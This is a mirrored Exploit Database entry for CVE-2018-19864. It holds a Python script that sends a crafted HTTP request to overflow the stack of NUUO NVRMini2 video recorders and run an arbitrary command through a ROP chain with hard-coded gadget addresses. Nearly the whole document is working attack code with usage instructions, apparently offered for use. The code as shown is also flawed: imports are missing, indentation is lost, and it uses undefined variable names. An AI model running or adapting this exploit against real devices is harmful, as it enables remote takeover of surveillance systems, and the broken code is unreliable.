NUUO NVRMini 2 3.9.1 – ‘sscanf’ Stack Overflow

• Exploit Database
• 13 阅读

• 作者： @0x00string
  日期： 2019-06-04
• 类别：

  • remote
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/46960/

• #!/usr/bin/python
  # Exploit Title: NUUO NVRMini2 3.9.1 'sscanf' stack overflow
  # Google Dork: n/a
  # Date: Advisory Published: Nov 18
  # Exploit Author: @0x00string
  # Vendor Homepage: nuuo.com
  # Software Link: https://www.nuuo.com/ProductNode.php?node=2
  # Version: 3.9.1 and prior
  # Tested on: 3.9.1
  # CVE : CVE-2018-19864
  #
  # [ leading / ]
  # [ Padding x 335 ]
  # [ original value at stack pointer + 158 ]
  # [ padding x 80 ]
  # [ address of (pop {r3,lr} ; bx lr) ]
  # [ system() address ]
  # [ address of (mov r0,sp ; blx r3) ]
  # [ command to execute ]
  
  def banner():
  print '''
  @0x00string
   0000000000000
  0000000000000000000 00
   00000000000000000000000000000
  0000000000000000000000000000000
  000000000 0000000000
   00000000 0000000000
  0000000000000000000
   0000000 000000000000000
   000000000000000000000
  0000000000000000 000000
  000000000000000000000
  000000000000000000000
  000000 00000000000000
  000000 000000000 000000
  00000000000000000000000
   000000 000000000 000000
   00000000000000000000000
  0000000000000 0000000
   0000000000000000000
   00000000000000000000
  0000000000000000000000000000000
   00000000000000000000000000000
   0000000000000000000000
   0000000000000
  https://github.com/0x00string/oldays/blob/master/CVE-2018-19864.py
  '''
  
  def usage ():
  print ("python script.py <args>\n"
  " -h, --help: Show this message\n"
  " -a, --rhost:Target IP address\n"
  " -b, --rport:Target Port - default 5150\n"
  " -c, --command:Command to execute\n"
  "\n"
  "Example:\n"
  "python script.py -a 10.10.10.10\n"
  "python script.py -a 10.10.10.10 -b 1234 -c reboot\n")
  exit()
  
  def main():
  rhost = None;
  rport = "5150";
  command = "{/bin/touch,/tmp/hax}"
  banner()
  options, remainder = getopt.getopt(sys.argv[1:], 'a:b:c:fh', ['rhost=','rport=','command=','help'])
  for opt, arg in options:
  if opt in ('-h', '--help'):
  usage()
  elif opt in ('-a','--rhost'):
  rhost = arg;
  elif opt in ('-b','--rport'):
  rport = arg;
  elif opt in ('-c','--command'):
  command = arg;
  print ("Sending exploit to execute [" + command + "]\n")
  buf = "GET /" + ("Z" * 335) + "\x30\x2a\x17\x45" + ("Y" * 80) + "\x08\xfc\x78\x40" +
  "\x44\xe0\x17\x40" + "\xcc\xb7\x77\x40" + command + " HTTP/1.1\r\nHost: " +
  "http://" + rhost + ":" + rport + "\r\n\r\n"
  sock = socket(AF_INET, SOCK_STREAM)
  sock.settimeout(30)
  sock.connect((target_ip,int(target_port)))
  sock.send(buf)
  print ("done\n")
  
  if __name__ == "__main__":
  main()